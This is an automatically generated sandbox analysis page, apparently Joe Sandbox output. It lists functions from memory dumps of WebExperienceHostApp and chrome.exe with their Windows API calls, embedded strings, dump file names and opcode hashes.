Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getmonthsmallocmemcpy
String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
API String ID: 1628830074-4232081075
Opcode ID: 0e3ca20c2d103951e4d7d7801fc3e20d684566a9d28fb9907ec1b8d7555c0598
Instruction ID: da1fd42653a080feaa745a5d1844989db3ca91c8fd0c53fee09df83f7b620a26
Opcode Fuzzy Hash: 0e3ca20c2d103951e4d7d7801fc3e20d684566a9d28fb9907ec1b8d7555c0598
Instruction Fuzzy Hash: 0FE0ED21B0AB4181EF05AF25E5853796360EF54BC4F9C4035DB1D46769DF3CD895C380

Function 00007FFE007A6270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE007A627D

Part of subcall function 00007FFE007A4D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D32
Part of subcall function 00007FFE007A4D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D58
Part of subcall function 00007FFE007A4D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D70

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A629A

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE007A62A5

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getdaysmallocmemcpy
String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1347072587-3283725177
Opcode ID: e3e5c3688c4805bfe07b39f3b0bc76f695c360df353ad2bd69f5daf1469f8f09
Instruction ID: 7043b254b6541ae370b2de05ba70c9d6810cc49bcfab48ca873a36e5db9ee859
Opcode Fuzzy Hash: e3e5c3688c4805bfe07b39f3b0bc76f695c360df353ad2bd69f5daf1469f8f09
Instruction Fuzzy Hash: D3E0ED2171AB4282EB05AB25F584379A360EF84BD4F9C8035DB1D4A7A9DF7CD894C350

Function 00007FF619497750 Relevance: 5.1, APIs: 4, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF619494580: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6194953C5,?,?,00000000,00007FF619495353), ref: 00007FF61949458F
Part of subcall function 00007FF619494580: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6194953C5,?,?,00000000,00007FF619495353), ref: 00007FF61949459D
Part of subcall function 00007FF619494580: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6194953C5,?,?,00000000,00007FF619495353), ref: 00007FF6194945B2

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF61949780C
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF61949781A

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 468bbb36f5f0524bfad220df1c36bc57dc39595cc71b805c81501286b27ccc0c
Instruction ID: 0df2f1ae4eade317a1c6b1594e7671b24643566b0aa559464301bd4717a46eeb
Opcode Fuzzy Hash: 468bbb36f5f0524bfad220df1c36bc57dc39595cc71b805c81501286b27ccc0c
Instruction Fuzzy Hash: B9318162A18D4286FB20EF25D5112BA6360FF9CFACF548131EA4D87696EE3CE555C700

Function 00007FFE007B91F8 Relevance: 5.0, APIs: 4, Instructions: 16COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B920A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9214
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B921E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9228

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7ad3a6edda06eaf9da7d43210142655a193d10ee84286b762144f3f5892102b8
Instruction ID: acfad4a1856e41eef0ab21511aeb3a2fa7197daea99ef0589c69bcb6e25b64d7
Opcode Fuzzy Hash: 7ad3a6edda06eaf9da7d43210142655a193d10ee84286b762144f3f5892102b8
Instruction Fuzzy Hash: 54E00266A16E0582EB14BF66E8940786334FF98FD9B2D1031CF1E56378CEACE8958300

Analysis Process: chrome.exePID: 2500, Parent PID: 7204COMMON

Non-executed Functions

Function 00007FF63EDF9260 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 372fileCOMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF63EDF9289
LocalFree.KERNEL32 ref: 00007FF63EDF9525
CreateFileW.KERNEL32 ref: 00007FF63EDF961D
GetLastError.KERNEL32 ref: 00007FF63EDF962B
SetLastError.KERNEL32 ref: 00007FF63EDF9647

Strings

AddACEToPath, xrefs: 00007FF63EDF9432
..\..\base\win\security_util.cc, xrefs: 00007FF63EDF9439
unknown, xrefs: 00007FF63EDF92D0, 00007FF63EDF92F3
ScopedBlockingCall, xrefs: 00007FF63EDF98A7
..\..\third_party\libc++\src\include\__string\char_traits.h:146: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF63EDF93B2
GetHandleVerifier, xrefs: 00007FF63EDF97A2

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ErrorLast$CreateFileFreeFrequencyLocalPerformanceQuery
String ID: ..\..\base\win\security_util.cc$..\..\third_party\libc++\src\include\__string\char_traits.h:146: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$AddACEToPath$GetHandleVerifier$ScopedBlockingCall$unknown
API String ID: 1041212472-3714041534
Opcode ID: 2a94ef9a2c619790470c30f70b427bbfb447ed72758ea588bfd145711e3ba0fc
Instruction ID: 3c48a475bb59e30568538953a741694db8eb5a0363b4d771d08fc49e1f5c4bfc
Opcode Fuzzy Hash: 2a94ef9a2c619790470c30f70b427bbfb447ed72758ea588bfd145711e3ba0fc
Instruction Fuzzy Hash: DE028031E0CA8281EB21CB65E4443BAA7E1EFA4744F444235FA8E87795DF7CE54AD720

Function 00007FF63EEC5B40 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 351COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00007FF63EEC5F7A
FreeEnvironmentStringsW.KERNEL32 ref: 00007FF63EEC60EF

Strings

Path, xrefs: 00007FF63EEC5FEC
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF63EEC5BF1
MZx, xrefs: 00007FF63EEC5E5E
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF63EEC5C04

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID: ..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$MZx$Path
API String ID: 3328510275-2741228475
Opcode ID: 2e8d2cea5652aef1997c0c6e3fd44ffdc10d1d007efab3305bc3d7331e825a76
Instruction ID: 0e821e2b35e439b2791034a0572ff9a2a403b7c77fd65c81320ed640b78dfd66
Opcode Fuzzy Hash: 2e8d2cea5652aef1997c0c6e3fd44ffdc10d1d007efab3305bc3d7331e825a76
Instruction Fuzzy Hash: 1EF16E36A0CAC685EB708B15E4443BA7BA0FFA4784F444135EA8D83795DFBCD549E720

Function 00007FF63EDC1270 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 201filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF63EDC13EA
GetLastError.KERNEL32 ref: 00007FF63EDC13F8
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF63EDC1426
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF63EDC148C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF63EDC149E
GetModuleHandleW.KERNEL32 ref: 00007FF63EDC1506
GetProcAddress.KERNEL32 ref: 00007FF63EDC1516
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF63EDC154A

Strings

DoInitialize, xrefs: 00007FF63EDC12BB
..\..\base\files\file_win.cc, xrefs: 00007FF63EDC12C2
GetHandleVerifier, xrefs: 00007FF63EDC150C

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ErrorLast$AddressCreateFileHandleModuleProc
String ID: ..\..\base\files\file_win.cc$DoInitialize$GetHandleVerifier
API String ID: 2959055312-1999724202
Opcode ID: b4213104a7f0ffe369f4dbb7d2f600790a4df51ea209aee29bdae8c187f37826
Instruction ID: 923ec3515970e748c693a01977028b34cb9fde699f3ae0d704dd54f0d8dfa61d
Opcode Fuzzy Hash: b4213104a7f0ffe369f4dbb7d2f600790a4df51ea209aee29bdae8c187f37826
Instruction Fuzzy Hash: FB71F331F1C65286FB248B15A455B7967A1BFA57C0F404538EE4F83BD1CE7DE049A360

Function 00007FF63EDEDD30 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF63EDEDE59
GetProcAddress.KERNEL32 ref: 00007FF63EDEDE69
GetModuleHandleW.KERNEL32 ref: 00007FF63EDEDEA1
GetProcAddress.KERNEL32 ref: 00007FF63EDEDEB1
GetModuleHandleW.KERNEL32 ref: 00007FF63EDEDEE9
GetProcAddress.KERNEL32 ref: 00007FF63EDEDEF9
GetModuleHandleW.KERNEL32 ref: 00007FF63EDEDF2D
GetProcAddress.KERNEL32 ref: 00007FF63EDEDF3D

Strings

GetHandleVerifier, xrefs: 00007FF63EDEDE5F, 00007FF63EDEDEA7, 00007FF63EDEDEEF, 00007FF63EDEDF33

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: e168955269868264cdbf627760c72bc19899b8782ac0a2a38a0c1ff0ad0597a3
Instruction ID: db131a90aa6f23f8db94f36a2e99c546ebfec760a113e5d0a67131c55c5a1800
Opcode Fuzzy Hash: e168955269868264cdbf627760c72bc19899b8782ac0a2a38a0c1ff0ad0597a3
Instruction Fuzzy Hash: 0561FC24A0DE47C1EB189B31E458339A361AFA4B84F545639E54FC33A8DFADB04DF220

Function 00007FF63EDC06F0 Relevance: 13.6, APIs: 9, Instructions: 110threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF63EDC0750
GetThreadPriority.KERNEL32(?,?,?,?,?,?,?,?,00007FF63EDB92A7), ref: 00007FF63EDC0755
GetCurrentThread.KERNEL32 ref: 00007FF63EDC075D
SetThreadPriority.KERNEL32(?,?,?,?,?,?,?,?,00007FF63EDB92A7), ref: 00007FF63EDC0767
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00007FF63EDB92A7), ref: 00007FF63EDC07CD
GetCurrentThread.KERNEL32 ref: 00007FF63EDC07D6
SetThreadPriority.KERNEL32(?,?,?,?,?,?,?,?,00007FF63EDB92A7), ref: 00007FF63EDC07E1
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,00007FF63EDB92A7), ref: 00007FF63EDC07F2
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00007FF63EDB92A7), ref: 00007FF63EDC08C0

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: Thread$CurrentPerformancePriorityQuery$Counter$Frequency
String ID:
API String ID: 2845919953-0
Opcode ID: d41863f0bab7a74801a6e9eb888ce44538a42d068fcc9f8d36fef3bdd22693a4
Instruction ID: 6adbb9125cff096dcaceed7f50376beb4f5ea5ea751a0fa2d1212aa9a9ab8c3c
Opcode Fuzzy Hash: d41863f0bab7a74801a6e9eb888ce44538a42d068fcc9f8d36fef3bdd22693a4
Instruction Fuzzy Hash: CD518E25E19A4289E721DB24F85027A63A1BF647D0F414339F90D933A4EF7CB18EE620

Function 00007FF63EDBEBA0 Relevance: 11.5, APIs: 9, Instructions: 230memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF63EDBEC1B
GetLastError.KERNEL32 ref: 00007FF63EDBEC54
VirtualAlloc.KERNEL32 ref: 00007FF63EDBECB2
GetLastError.KERNEL32 ref: 00007FF63EDBECD9
VirtualAlloc.KERNEL32 ref: 00007FF63EDBED37
VirtualFree.KERNEL32 ref: 00007FF63EDBED64
GetLastError.KERNEL32 ref: 00007FF63EDBED7C
VirtualFree.KERNEL32 ref: 00007FF63EDBEE15

Part of subcall function 00007FF63EF45F10: TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBEE57), ref: 00007FF63EF45F1B
Part of subcall function 00007FF63EF45F10: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBEE57), ref: 00007FF63EF45F38

Part of subcall function 00007FF63EF45EC0: VirtualAlloc.KERNEL32(?,?,00000000,00007FF63EDBEE67), ref: 00007FF63EF45EDE

VirtualFree.KERNEL32 ref: 00007FF63EDBEE3B

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: Virtual$Alloc$ErrorFreeLast$ExclusiveLock$AcquireRelease
String ID:
API String ID: 2766871365-0
Opcode ID: 7a7c9985949ac4f6b153028ab4394bfe74fe536323968ae8dd273fc7f1b11144
Instruction ID: d89c4c18ff589147d2353a8929394ea828431e34ba58b5b9990d0ff43c907baa
Opcode Fuzzy Hash: 7a7c9985949ac4f6b153028ab4394bfe74fe536323968ae8dd273fc7f1b11144
Instruction Fuzzy Hash: BE719121F1D61B42FE6D9B62681173916C1AF64B84F444638FC0EC7790EE7DF00EA220

Function 00007FF63EDFB6F0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 390COMMON

Download Yara Rule

Strings

Micr, xrefs: 00007FF63EDFBA1F
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF63EDFB9D0
osof, xrefs: 00007FF63EDFBA2C
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF63EDFBA54
t Hv, xrefs: 00007FF63EDFBA38

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID:
String ID: ..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Micr$osof$t Hv
API String ID: 0-3846041463
Opcode ID: ffc7980804d91dd16e1d3ff1e57e6d48ca1c4d1261400109e334abcf9a82018e
Instruction ID: cc0fe23bc8bda440c589035aa6e12a48cd7e19b142c4f39a51aaecc59cdb8d8e
Opcode Fuzzy Hash: ffc7980804d91dd16e1d3ff1e57e6d48ca1c4d1261400109e334abcf9a82018e
Instruction Fuzzy Hash: FBE15A73B186468AEB21CB19D4412BD7BA0F764784F04823AEF4E87791DE7CE54AD350

Function 00007FF63EDBE2A0 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 379COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDBE380
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDBE415
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000010,3333333333333333,-5555555555555556,?,?,?,00000000,?,00007FF63EDCCA89), ref: 00007FF63EDBE452

Strings

first, xrefs: 00007FF63EDBE7DD, 00007FF63EDBE80B

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID: first
API String ID: 1021914862-2456940119
Opcode ID: 263630f1d0c64731c2a633dcdcc5e80b77f3adc82f8f6008f0bd82b076963928
